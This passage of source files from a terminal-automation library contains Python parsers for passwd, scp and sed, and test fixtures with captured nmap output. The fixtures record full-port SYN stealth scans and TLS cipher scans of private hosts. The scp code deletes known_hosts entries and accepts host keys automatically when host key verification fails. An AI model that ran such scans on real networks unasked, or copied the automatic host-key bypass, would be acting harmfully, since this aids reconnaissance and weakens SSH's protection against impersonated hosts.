'RCVD_NO': '0',
'RCVD_SIZE': '0B',
'SENT_NO': '2',
'SENT_SIZE': '56B'
},
'SCAN_REPORT': {
'ADDRESS': '192.168.255.4',
'HOST': 'down',
'LINE': 'Nmap scan report for 192.168.255.4 [host down, received no-response]',
'RECEIVED': 'no-response'
}
}
COMMAND_OUTPUT = """root@cp19-nj:/home/ute# nmap -d1 -p- --host-timeout 100 10.9.134.0/28 -PN
Starting Nmap 6.00 ( http://nmap.org ) at 2018-05-31 03:23 CST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 100000
min-rate: 0, max-rate: 0
---------------------------------------------
mass_rdns: Using DNS server 192.168.3.11
mass_rdns: Using DNS server 172.16.31.10
Initiating Parallel DNS resolution of 16 hosts. at 03:23
mass_rdns: 0.01s 0/16 [#: 2, OK: 0, NX: 0, DR: 0, SF: 0, TR: 16]
Completed Parallel DNS resolution of 16 hosts. at 03:23, 9.08s elapsed
DNS resolution of 16 IPs took 9.08s. Mode: Async [#: 2, OK: 0, NX: 16, DR: 0, SF: 0, TR: 36, CN: 0]
Initiating SYN Stealth Scan at 03:23
Scanning 4 hosts [65535 ports/host]
Packet capture filter (device eth0): dst host 10.9.132.16 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 10.9.134.0 or src host 10.9.134.1 or src host 10.9.134.2 or src host 10.9.134.3)))
Discovered open port 23/tcp on 10.9.134.1
Discovered open port 80/tcp on 10.9.134.1
Discovered open port 22/tcp on 10.9.134.1
Discovered open port 443/tcp on 10.9.134.1
Discovered open port 21/tcp on 10.9.134.1
Increased max_successful_tryno for 10.9.134.1 to 1 (packet drop)
Increased max_successful_tryno for 10.9.134.1 to 2 (packet drop)
Increased max_successful_tryno for 10.9.134.1 to 3 (packet drop)
Increased max_successful_tryno for 10.9.134.1 to 4 (packet drop)
Increasing send delay for 10.9.134.1 from 0 to 5 due to max_successful_tryno increase to 4
Increased max_successful_tryno for 10.9.134.1 to 5 (packet drop)
Increasing send delay for 10.9.134.1 from 5 to 10 due to max_successful_tryno increase to 5
Increased max_successful_tryno for 10.9.134.1 to 6 (packet drop)
Increasing send delay for 10.9.134.1 from 10 to 20 due to max_successful_tryno increase to 6
SYN Stealth Scan Timing: About 0.49% done
SYN Stealth Scan Timing: About 1.98% done; ETC: 04:15 (0:50:16 remaining)
Increased max_successful_tryno for 10.9.134.1 to 7 (packet drop)
Increasing send delay for 10.9.134.1 from 20 to 40 due to max_successful_tryno increase to 7
Increased max_successful_tryno for 10.9.134.1 to 8 (packet drop)
Increasing send delay for 10.9.134.1 from 40 to 80 due to max_successful_tryno increase to 8
SYN Stealth Scan Timing: About 3.32% done; ETC: 04:09 (0:44:09 remaining)
10.9.134.0 timed out during SYN Stealth Scan (3 hosts left)
10.9.134.1 timed out during SYN Stealth Scan (2 hosts left)
10.9.134.2 timed out during SYN Stealth Scan (1 host left)
10.9.134.3 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 03:25, 100.05s elapsed (4 hosts timed out)
Overall sending rates: 230.05 packets / s, 10122.35 bytes / s.
Nmap scan report for 10.9.134.0
Host is up, received user-set.
Skipping host 10.9.134.0 due to host timeout
Nmap scan report for 10.9.134.1
Host is up, received user-set (0.0035s latency).
Skipping host 10.9.134.1 due to host timeout
Nmap scan report for 10.9.134.2
Host is up, received user-set.
Skipping host 10.9.134.2 due to host timeout
Nmap scan report for 10.9.134.3
Host is up, received user-set.
Skipping host 10.9.134.3 due to host timeout
Initiating SYN Stealth Scan at 03:25
Scanning 12 hosts [65535 ports/host]
Packet capture filter (device eth0): dst host 10.9.132.16 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 10.9.134.4 or src host 10.9.134.5 or src host 10.9.134.6 or src host 10.9.134.7 or src host 10.9.134.8 or src host 10.9.134.9 or src host 10.9.134.10 or src host 10.9.134.11 or src host 10.9.134.12 or src host 10.9.134.13 or src host 10.9.134.14 or src host 10.9.134.15)))
Discovered open port 23/tcp on 10.9.134.4
Discovered open port 445/tcp on 10.9.134.12
Discovered open port 445/tcp on 10.9.134.13
Discovered open port 3389/tcp on 10.9.134.12
Discovered open port 3389/tcp on 10.9.134.13
Discovered open port 135/tcp on 10.9.134.12
Discovered open port 443/tcp on 10.9.134.12
Discovered open port 135/tcp on 10.9.134.13
Discovered open port 139/tcp on 10.9.134.12
Discovered open port 443/tcp on 10.9.134.13
Discovered open port 139/tcp on 10.9.134.13
Increased max_successful_tryno for 10.9.134.12 to 1 (packet drop)
Discovered open port 22/tcp on 10.9.134.4
Increased max_successful_tryno for 10.9.134.13 to 1 (packet drop)
Discovered open port 443/tcp on 10.9.134.4
Discovered open port 22/tcp on 10.9.134.15
Discovered open port 21/tcp on 10.9.134.4
SYN Stealth Scan Timing: About 1.04% done; ETC: 04:15 (0:49:20 remaining)
SYN Stealth Scan Timing: About 4.44% done; ETC: 03:48 (0:21:52 remaining)
SYN Stealth Scan Timing: About 11.04% done; ETC: 03:39 (0:12:13 remaining)
10.9.134.4 timed out during SYN Stealth Scan (11 hosts left)
10.9.134.5 timed out during SYN Stealth Scan (10 hosts left)
10.9.134.6 timed out during SYN Stealth Scan (9 hosts left)
10.9.134.7 timed out during SYN Stealth Scan (8 hosts left)
10.9.134.8 timed out during SYN Stealth Scan (7 hosts left)
10.9.134.9 timed out during SYN Stealth Scan (6 hosts left)
10.9.134.10 timed out during SYN Stealth Scan (5 hosts left)
10.9.134.11 timed out during SYN Stealth Scan (4 hosts left)
10.9.134.12 timed out during SYN Stealth Scan (3 hosts left)
10.9.134.13 timed out during SYN Stealth Scan (2 hosts left)
10.9.134.14 timed out during SYN Stealth Scan (1 host left)
10.9.134.15 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 03:27, 100.00s elapsed (12 hosts timed out)
Overall sending rates: 1876.97 packets / s, 82586.62 bytes / s.
Nmap scan report for 10.9.134.4
Host is up, received user-set (0.00045s latency).
Skipping host 10.9.134.4 due to host timeout
Nmap scan report for 10.9.134.5
Host is up, received user-set.
Skipping host 10.9.134.5 due to host timeout
Nmap scan report for 10.9.134.6
Host is up, received user-set.
Skipping host 10.9.134.6 due to host timeout
Nmap scan report for 10.9.134.7
Host is up, received user-set.
Skipping host 10.9.134.7 due to host timeout
Nmap scan report for 10.9.134.8
Host is up, received user-set.
Skipping host 10.9.134.8 due to host timeout
Nmap scan report for 10.9.134.9
Host is up, received user-set.
Skipping host 10.9.134.9 due to host timeout
Nmap scan report for 10.9.134.10
Host is up, received user-set.
Skipping host 10.9.134.10 due to host timeout
Nmap scan report for 10.9.134.11
Host is up, received user-set.
Skipping host 10.9.134.11 due to host timeout
Nmap scan report for 10.9.134.12
Host is up, received user-set (0.00023s latency).
Skipping host 10.9.134.12 due to host timeout
Nmap scan report for 10.9.134.13
Host is up, received user-set (0.00030s latency).
Skipping host 10.9.134.13 due to host timeout
Nmap scan report for 10.9.134.14
Host is up, received user-set.
Skipping host 10.9.134.14 due to host timeout
Nmap scan report for 10.9.134.15
Host is up, received user-set (0.00030s latency).
Skipping host 10.9.134.15 due to host timeout
Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 16 IP addresses (16 hosts up) scanned in 209.25 seconds
Raw packets sent: 210722 (9.272MB) | Rcvd: 18224 (730.812KB)
root@cp19-nj:/home/ute# """
COMMAND_KWARGS = {'options': '-d1 -p- --host-timeout 100',
'ip': '10.9.134.0/28'}
COMMAND_RESULT = {
'RAW_PACKETS': {
'RCVD_NO': '18224',
'RCVD_SIZE': '730.812KB',
'SENT_NO': '210722',
'SENT_SIZE': '9.272MB'
},
'SKIPPING_HOST': {
'HOST': [
'10.9.134.0',
'10.9.134.1',
'10.9.134.2',
'10.9.134.3',
'10.9.134.4',
'10.9.134.5',
'10.9.134.6',
'10.9.134.7',
'10.9.134.8',
'10.9.134.9',
'10.9.134.10',
'10.9.134.11',
'10.9.134.12',
'10.9.134.13',
'10.9.134.14',
'10.9.134.15']},
'SYN_STEALTH_SCAN': {
'DONE': '11.04',
'ETC': '03:39',
'REMAINING': '0:12:13'
},
'SCAN_REPORTS': [{u'ADDRESS': u'10.9.134.0',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.0',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.1',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.1',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.2',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.2',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.3',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.3',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.4',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.4',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.5',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.5',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.6',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.6',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.7',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.7',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.8',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.8',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.9',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.9',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.10',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.10',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.11',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.11',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.12',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.12',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.13',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.13',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.14',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.14',
u'RECEIVED': None},
{u'ADDRESS': u'10.9.134.15',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.9.134.15',
u'RECEIVED': None}],
}
COMMAND_OUTPUT_CIPHERS = """root@cp19-nj:# nmap --script ssl-enum-ciphers -p 443 10.83.180.140 -PN
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 10:43 CET
Nmap scan report for 10.83.182.143
Host is up (0.000067s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-enum-ciphers:
| TLSv1.2:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 4096) - A
| compressors:
| NULL
| cipher preference: client
|_ least strength: A
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
root@cp19-nj:#"""
COMMAND_KWARGS_CIPHERS = {'options': '--script ssl-enum-ciphers -p 443',
'ip': '10.83.180.140'}
COMMAND_RESULT_CIPHERS = {u'CIPHERS': [u'TLS_DHE_RSA_WITH_AES_128_GCM_SHA256'],
u'PORTS': {u'443/tcp': {u'PORT': u'443',
u'REASON': None,
u'SERVICE': u'https',
u'STATE': u'open',
u'TYPE': u'tcp'},
u'LINES': [u'443/tcp open https']},
u'SCAN_REPORTS': [{u'ADDRESS': u'10.83.182.143',
u'HOST': None,
u'LINE': u'Nmap scan report for 10.83.182.143',
u'RECEIVED': None}]}
```
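The per-port entries in the result dictionaries above come directly from `Nmap._re_ports_line`; a self-contained check of that pattern (plain `re`, one line taken from the sample output):

```python
import re

_re_ports_line = re.compile(r"^(?P<LINES>(?P<PORTS>(?P<PORT>\d+)\/(?P<TYPE>\w+))\s+"
                            r"(?P<STATE>\S+)\s+(?P<SERVICE>\S+)\s*(?P<REASON>\S+)?\s*)$")

match = _re_ports_line.search("443/tcp open https syn-ack")
entry = match.groupdict()
port_key = entry.pop("PORTS")   # "443/tcp" becomes the key in current_ret["PORTS"]
entry.pop("LINES")              # the raw line goes into current_ret["PORTS"]["LINES"] instead
print(port_key, entry)
# 443/tcp {'PORT': '443', 'TYPE': 'tcp', 'STATE': 'open', 'SERVICE': 'https', 'REASON': 'syn-ack'}
```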
#### File: cmd/unix/passwd.py
```python
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class Passwd(GenericUnixCommand):
    def __init__(self, connection, current_password=None, new_password=None, user=None, options=None,
encrypt_password=True, newline_chars=None, runner=None):
"""
Moler class of Unix command passwd.
:param connection: moler connection to device, terminal when command is executed
        :param current_password: user's current password
        :param new_password: new password to set
:param user: user to change password
:param options: additional command parameters
:param encrypt_password: If True then * will be in logs when password is sent, otherwise plain text
:param newline_chars: Characters to split lines
:param runner: Runner to run command
"""
super(Passwd, self).__init__(connection=connection, newline_chars=newline_chars, runner=runner)
self.user = user
        self.current_password = current_password
        self.new_password = new_password
self.options = options
self.encrypt_password = encrypt_password
self._current_password_sent = False
self._new_password_sent = False
self._retype_new_password_sent = False
self._cancel_cmd = False
self.current_ret["PASSWORD_CHANGED"] = False
self.current_ret["LINES"] = []
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
cmd = "passwd"
if self.options:
cmd = "{} {}".format(cmd, self.options)
if self.user:
cmd = "{} {}".format(cmd, self.user)
return cmd
def on_new_line(self, line, is_full_line):
"""
Parses the output of the command.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
try:
if self._cancel_cmd:
self._send_enters_to_cancel_cmd()
if is_full_line:
self._parse_line(line)
self._parse_re_too_short_password(line)
self._parse_too_simple_password(line)
self._parse_error(line)
self._parse_password_updated_successfully(line)
self._parse_current_password(line)
self._parse_new_password(line)
self._parse_retype_new_password(line)
except ParsingDone:
pass
return super(Passwd, self).on_new_line(line, is_full_line)
# Current password:
_re_current_password = re.compile(r'Current .*password:')
def _parse_current_password(self, line):
"""
Detect current password prompt.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_current_password, line) and not self._current_password_sent:
self.connection.sendline(data=self.current_password, encrypt=self.encrypt_password)
self._current_password_sent = True
raise ParsingDone
# New password:
_re_new_password = re.compile(r'New .*password:')
def _parse_new_password(self, line):
"""
Detect new password prompt.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_new_password, line) and not self._new_password_sent:
self.connection.sendline(data=self.new_password, encrypt=self.encrypt_password)
self._new_password_sent = True
raise ParsingDone
# Retype new password:
_re_retype_new_password = re.compile(r'Retype .*new password:')
def _parse_retype_new_password(self, line):
"""
Detect retype new password prompt.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_retype_new_password,
line) and not self._retype_new_password_sent:
self.connection.sendline(data=self.new_password, encrypt=self.encrypt_password)
self._retype_new_password_sent = True
raise ParsingDone
# Bad: new password is too simple
_re_too_simple_password = re.compile(r'Bad: new password is too simple')
def _parse_too_simple_password(self, line):
"""
Parse too simple password error.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_too_simple_password, line):
self.set_exception(CommandFailure(self, "New password is too simple."))
self._cancel_cmd = True
# You must choose a longer password
_re_too_short_password = re.compile(r'You must choose a longer password')
def _parse_re_too_short_password(self, line):
"""
Parse too short password error.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_too_short_password, line):
self.set_exception(CommandFailure(self, "New password is too short."))
self._cancel_cmd = True
raise ParsingDone
# passwd: Authentication token manipulation error
_re_passwd_error = re.compile(r"passwd: (?P<ERROR>.* error)")
def _parse_error(self, line):
"""
Parse another error.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_passwd_error, line):
self.set_exception(CommandFailure(self, "Unexpected error: '{}'".format(self._regex_helper.group('ERROR'))))
self._cancel_cmd = True
raise ParsingDone
# passwd: password updated successfully
_re_password_updated_successfully = re.compile(r'passwd: password updated successfully')
def _parse_password_updated_successfully(self, line):
"""
Parse password updated successfully.
:param line: Line from device.
:return: None but raises ParsingDone if all required commands are sent.
"""
if self._regex_helper.search_compiled(Passwd._re_password_updated_successfully, line):
self.current_ret["PASSWORD_CHANGED"] = True
raise ParsingDone
def _parse_line(self, line):
"""
Parse single full line and add it to result dict.
:param line: Line from device.
:return: None
"""
self.current_ret["LINES"].append(line)
    def _send_enters_to_cancel_cmd(self):
"""
Send enter to cancel cmd.
:return: None but raises ParsingDone if all required commands are sent.
"""
self.connection.sendline("")
raise ParsingDone
COMMAND_OUTPUT_no_user = """user@host:~$: passwd
Changing password for user.
Current password:
New password:
Retype new password:
passwd: password updated successfully
user@host:~$"""
COMMAND_KWARGS_no_user = {
"current_password": "<PASSWORD>",
"new_password": "<PASSWORD>"
}
COMMAND_RESULT_no_user = {
"PASSWORD_CHANGED": True,
"LINES": [
"Changing password for user.",
"Current password:",
"New password:",
"Retype new password:",
"passwd: <PASSWORD>",
]
}
COMMAND_OUTPUT_with_user = """user@host:~$: passwd user
Changing password for user.
Current password:
New password:
Retype new password:
passwd: password updated successfully
user@host:~$"""
COMMAND_KWARGS_with_user = {
"user": "user",
"current_password": "old_password",
"new_password": "<PASSWORD>"
}
COMMAND_RESULT_with_user = {
"PASSWORD_CHANGED": True,
"LINES": [
"Changing password for user.",
"Current password:",
"New password:",
"Retype new password:",
"passwd: <PASSWORD>",
]
}
COMMAND_OUTPUT_with_options = """user@host:~$: passwd -S user
user P 05/22/2018 0 99999 7 -1
user@host:~$"""
COMMAND_KWARGS_with_options = {
"user": "user",
"options": "-S"
}
COMMAND_RESULT_with_options = {
"PASSWORD_CHANGED": False,
"LINES": [
"user P 05/22/2018 0 99999 7 -1"
]
}
```
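The COMMAND_OUTPUT / COMMAND_KWARGS / COMMAND_RESULT triplets above are the fixtures the library CI replays against the parser. Below is a minimal usage sketch for the same command; the config path, device name and passwords are placeholders, not values from the library source.
```python
# Sketch only: assumes 'my_devices.yml' defines a Unix device named 'MyMachine';
# all names and passwords are placeholders.
from moler.config import load_config
from moler.device.device import DeviceFactory

load_config(config='my_devices.yml')
my_unix = DeviceFactory.get_device(name='MyMachine')

# Same keyword arguments as COMMAND_KWARGS_no_user above.
passwd_cmd = my_unix.get_cmd(cmd_name="passwd",
                             cmd_params={"current_password": "old_pass",
                                         "new_password": "new_pass"})
result = passwd_cmd()                           # blocking call; runs passwd on the device
assert result.get("PASSWORD_CHANGED") is True   # mirrors COMMAND_RESULT_no_user
```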
#### File: cmd/unix/scp.py
```python
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
import six
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>'
class Scp(GenericUnixCommand):
def __init__(self, connection, source, dest, password="", options="", prompt=None, newline_chars=None,
known_hosts_on_failure='keygen', encrypt_password=True, runner=None, repeat_password=True):
"""
Represents Unix command scp.
:param connection: moler connection to device, terminal when command is executed
:param source: path to source
:param dest: path to destination
:param password: scp password or list of passwords for multi passwords connection
:param prompt: prompt (on system where command runs).
:param newline_chars: characters to split lines
:param known_hosts_on_failure: "rm" or "keygen" how to deal with error. If empty then scp fails.
:param encrypt_password: If True then * will be in logs when password is sent, otherwise plain text
:param runner: Runner to run command
:param repeat_password: If True then repeat last password if no more provided. If False then exception is set.
"""
super(Scp, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.source = source
self.dest = dest
self.options = options
self.known_hosts_on_failure = known_hosts_on_failure
self.encrypt_password = encrypt_password
self.ret_required = True
# Internal variables
self._sent_password = False
self._sent_continue_connecting = False
self._hosts_file = ""
if isinstance(password, six.string_types):
self._passwords = [password]
else:
self._passwords = list(password) # copy of list of passwords to modify
self.repeat_password = repeat_password
self._last_password = ""
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
cmd = "scp"
if self.options:
cmd = "{} {} {} {}".format(cmd, self.options, self.source, self.dest)
else:
cmd = "{} {} {}".format(cmd, self.source, self.dest)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise.
:return: None.
"""
try:
self._know_hosts_verification(line)
self._parse_success(line)
self._push_yes_if_needed(line)
self._parse_sent_password(line)
self._parse_failed(line)
self._get_hosts_file_if_displayed(line)
except ParsingDone:
pass
if is_full_line:
self._sent_password = False # Clear flag for multi passwords connections
return super(Scp, self).on_new_line(line, is_full_line)
_re_parse_success = re.compile(r'^(?P<FILENAME>\S+)\s+.*\d+%.*')
def _parse_success(self, line):
"""
Parses line if success.
:param line: Line from device.
:return: None.
:raises ParsingDone: if matches success.
"""
if self._regex_helper.search_compiled(Scp._re_parse_success, line):
if 'FILE_NAMES' not in self.current_ret.keys():
self.current_ret['FILE_NAMES'] = list()
self.current_ret['FILE_NAMES'].append(self._regex_helper.group('FILENAME'))
raise ParsingDone()
_re_parse_failed = re.compile(
r'cannot access|Could not|no such|denied|not a regular file|Is a directory|No route to host|'
r'lost connection|Not a directory', re.IGNORECASE)
def _parse_failed(self, line):
"""
Parses line if failed.
:param line: Line from device.
:return: None.
:raises ParsingDone: if matches fail.
"""
if self._regex_helper.search_compiled(Scp._re_parse_failed, line):
self.set_exception(CommandFailure(self, "Command failed in line >>{}<<.".format(line)))
raise ParsingDone()
_re_parse_permission_denied = re.compile(
r'Permission denied, please try again|Permission denied \(publickey,password\)')
def _parse_sent_password(self, line):
"""
Sends password if necessary.
:param line: Line from device.
:return: None.
:raises ParsingDone: if password was sent.
"""
if (not self._sent_password) and self._is_password_requested(line):
try:
pwd = self._passwords.pop(0)
self._last_password = pwd
self.connection.sendline(pwd, encrypt=self.encrypt_password)
except IndexError:
if self.repeat_password:
self.connection.sendline(self._last_password, encrypt=self.encrypt_password)
else:
self.set_exception(CommandFailure(self, "Password was requested but no more passwords provided."))
self.break_cmd()
self._sent_password = True
raise ParsingDone()
_re_password = re.compile(r'password:', re.IGNORECASE)
def _is_password_requested(self, line):
"""
Parses line if password is requested.
:param line: Line from device.
:return: Match object if matches, otherwise None.
"""
return self._regex_helper.search_compiled(Scp._re_password, line)
def _push_yes_if_needed(self, line):
"""
Sends yes to device if needed.
:param line: Line from device.
:return: None.
:raises ParsingDone: if line handled by this method.
"""
if (not self._sent_continue_connecting) and self._parse_continue_connecting(line):
self.connection.sendline('yes')
self._sent_continue_connecting = True
raise ParsingDone()
_re_continue_connecting = re.compile(r"\(y/n\)|\(yes/no.*\)\?|'yes' or 'no':", re.IGNORECASE)
def _parse_continue_connecting(self, line):
"""
Parses continue connecting.
:param line: Line from device.
:return: Match object if matches, None otherwise.
"""
return self._regex_helper.search_compiled(Scp._re_continue_connecting, line)
_re_host_key = re.compile(r"Add correct host key in (?P<PATH>\S+) to get rid of this message", re.IGNORECASE)
def _get_hosts_file_if_displayed(self, line):
"""
Parses hosts file.
:param line: Line from device.
:return: None.
:raises ParsingDone: if line handled by this method.
"""
if (self.known_hosts_on_failure is not None) and self._regex_helper.search_compiled(Scp._re_host_key, line):
self._hosts_file = self._regex_helper.group("PATH")
raise ParsingDone()
_re_id_dsa = re.compile("id_dsa:", re.IGNORECASE)
_re_host_key_verification_failure = re.compile(r'Host key verification failed.')
def _know_hosts_verification(self, line):
"""
Parses host key verification.
:param line: Line from device.
:return: None.
:raises ParsingDone: if line handled by this method.
"""
if self._regex_helper.search_compiled(Scp._re_id_dsa, line):
self.connection.sendline("")
raise ParsingDone()
elif self._regex_helper.search_compiled(Scp._re_host_key_verification_failure, line):
if self._hosts_file:
self._handle_failed_host_key_verification()
else:
self.set_exception(CommandFailure(self, "Command failed in line >>{}<<.".format(line)))
raise ParsingDone()
def _handle_failed_host_key_verification(self):
"""
Handles failed host key verification.
:return: None.
"""
if "rm" == self.known_hosts_on_failure:
self.connection.sendline("\nrm -f " + self._hosts_file)
elif "keygen" == self.known_hosts_on_failure:
self.connection.sendline("\nssh-keygen -R " + self.dest)
else:
self.set_exception(
CommandFailure(self,
"Bad value of parameter known_hosts_on_failure '{}'. "
"Supported values: rm or keygen.".format(
self.known_hosts_on_failure)))
self._sent_continue_connecting = False
self._sent_password = False
self.connection.sendline(self.command_string)
COMMAND_OUTPUT_succsess = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
COMMAND_KWARGS_succsess = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>"
}
COMMAND_RESULT_succsess = {
'FILE_NAMES': [
u'test.txt'
]
}
COMMAND_OUTPUT_recursively_succsess = """
ute@debdev:~/Desktop$ scp -r test ute@localhost:/home/ute
ute@localhost's password:
test.txt 100% 104 0.1KB/s 00:00
test2.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
COMMAND_KWARGS_recursively_succsess = {
"source": "test",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
"options": "-r"
}
COMMAND_RESULT_recursively_succsess = {
'FILE_NAMES': [
u'test.txt',
u'test2.txt'
]
}
COMMAND_KWARGS_rm = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
"known_hosts_on_failure": "rm"
}
COMMAND_OUTPUT_rm = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
Are you sure you want to continue connecting (yes/no)?"
Please contact your system administrator.
Add correct host key in /home/sward/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/sward/.ssh/known_hosts:86
RSA host key for [...] has changed and you have requested strict checking.
Host key verification failed.
ute@debdev:~/Desktop$ rm -f /home/sward/.ssh/known_hosts
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$ """
COMMAND_RESULT_rm = {
'FILE_NAMES': [
u'test.txt'
]
}
COMMAND_KWARGS_keygen = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": "<PASSWORD>",
}
COMMAND_OUTPUT_keygen = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
id_dsa:
Are you sure you want to continue connecting (yes/no)?"
Please contact your system administrator.
Add correct host key in /home/sward/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/sward/.ssh/known_hosts:86
RSA host key for [...] has changed and you have requested strict checking.
Host key verification failed.
ute@debdev:~/Desktop$ ssh-keygen -R ute@localhost:/home/ute
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$ """
COMMAND_RESULT_keygen = {
'FILE_NAMES': [
u'test.txt'
]
}
COMMAND_OUTPUT_ldap = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
ldap password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
COMMAND_KWARGS_ldap = {
"source": "test.txt",
"dest": "ute@localhost:/home/ute",
"password": ("<PASSWORD>", "<PASSWORD>")
}
COMMAND_RESULT_ldap = {
'FILE_NAMES': [
u'test.txt'
]
}
```
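A hedged usage sketch for the multi-password case illustrated by COMMAND_OUTPUT_ldap above; the device name, passwords and timeout are assumptions, not values taken from the library.
```python
# Sketch only: 'my_devices.yml' / 'MyMachine' and all literals are placeholders.
from moler.config import load_config
from moler.device.device import DeviceFactory

load_config(config='my_devices.yml')
my_unix = DeviceFactory.get_device(name='MyMachine')
scp_cmd = my_unix.get_cmd(
    cmd_name="scp",
    cmd_params={"source": "test.txt",
                "dest": "ute@localhost:/home/ute",
                "password": ("login_pass", "ldap_pass"),  # one entry per password prompt
                "known_hosts_on_failure": "keygen"})      # or "rm"
result = scp_cmd(timeout=60)      # calling the command runs it and returns the result dict
print(result["FILE_NAMES"])       # e.g. ['test.txt']
```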
#### File: cmd/unix/sed.py
```python
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>, <EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
class Sed(GenericUnixCommand):
def __init__(self, connection, input_files, prompt=None, newline_chars=None, runner=None, options=None,
scripts=None, script_files=None, output_file=None):
super(Sed, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
# Parameters defined by calling the command
self.options = options # string or None
self.scripts = scripts # list of strings or None
self.script_files = script_files # list of strings or None
self.input_files = input_files # list of strings
self.output_file = output_file # string or None
# Other parameters
self.current_ret['RESULT'] = list()
def build_command_string(self):
cmd = "sed"
if self.options:
cmd = "{} {}".format(cmd, self.options)
if self.scripts:
for script in self.scripts:
cmd = "{} -e '{}'".format(cmd, script)
if self.script_files:
for script_file in self.script_files:
cmd = "{} -f {}".format(cmd, script_file)
if self.input_files:
for in_file in self.input_files:
cmd = "{} {}".format(cmd, in_file)
